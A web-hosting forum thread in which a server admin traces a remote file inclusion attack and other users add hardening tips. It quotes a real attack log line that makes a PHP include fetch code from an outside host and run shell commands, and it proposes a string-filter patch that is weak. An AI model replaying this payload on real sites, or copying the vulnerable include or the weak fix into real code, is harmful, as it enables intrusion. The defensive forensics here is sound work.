• If you are still using CentOS 7.9, it's time to convert to Alma 8 with the free centos2alma tool by Plesk or Plesk Migrator. Please let us know your experiences or concerns in this thread:
    CentOS2Alma discussion

Catching a Hacker

G

gromett

Guest
I am happy to say that since moving on to Plesk attacks and attempts on my servers have been greatly reduced. The only ones I get now are the cross server scripting ones. Currently I just monitor the /tmp and /var/tmp directory for suspicious files every minute which lets me know when one is in progress. What follows is how I managed to track down how it happened so I could fix the clients dodgy script. I am posting this to help others who may not have time or knowledge to do so.

1) I went to /var/tmp and moved all files to /root/hack for later perusal
2) Did a ps aux to get the process id's and file names of the scripts being run.
apache 29836 0.0 0.0 864 184 ttyp0 S 19:32 0:00 ./ssh-scan 100
These had been created by a shell called /.x
3) Did a netstat -lvanp to find out the remote IP of the attacker.
tcp 0 0 213.232.100.82:5500 222.124.31.12:4352 ESTABLISHED 7862/x
4) Hackers IP is 222.124.31.12 now to find out which script was responsible for the breach
5) used this find command to check all log files
find /home/httpd/vhosts/ -name access_log -print -exec grep "195.93.21.100" {} \;
6) From this I could see the site name (modified)
cat /home/httpd/vhosts/thedomain.com/statistics/logs/access_log | grep "222.124.31.12" >/root/hack/access_log

Here is a sample log entry
/eolaud.php?SiteRef=http://www.virama.com/net.txt?&cmd=cd%20/var/spool/samba;mkdir%20.ro HTTP/1.0" 200 9623 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)"

The script was is called eolaud.php
I had a look at this script and it had 1 line of php code in it.
<?
include $SiteRef;
?>

You can see that by passing ?SiteRef=......
You could include a file or script from another site.

I changed this script to the following and notified the client
<?
if (eregi("http",$SiteRef)) {
$SiteRef="";
}
include $SiteRef;
?>

If a remote address is now entered it blanks the variable.

In addition to this I have contacted the 4 hosts that were used by the hacker including the
http://geocities.com/evikhobare/dodol.txt
www.virama.com
the IP owner for the hacker and the site were he had his hacking tools hosted.
Hopefully he will be shut down. I have offered all the forensic evidence to the providers if they want to bring the authorities in.

I am updating my checking scripts to include an hourly scan of all access_logs looking for /var/tmp and /tmp

I hope this info helps.


Regards Karl
 
Karl,

Congratulations with your "catch" and thanks for sharing this with us.

Just one extra question: when you say that you monitor /tmp and /var/tmp every minute, what are you actually doing and looking for?

Ingrid.
 
thx for sharing the info Karl.

i have quite a similiar attach and it's full my bandwitdh.

but now instead monitoring my /var/tmp and /tmp , i made a personal partion to /tmp and i loaded it with noexec, and nosuid .
i also change mode to wget, c**, gcc** to 600 (root only access) and scan through my home/httpd/vhost for unusual file and expesially file that own by apache and world writeable when it's all gone, my server is normal again.

Regards
Lucky
 
Back
Top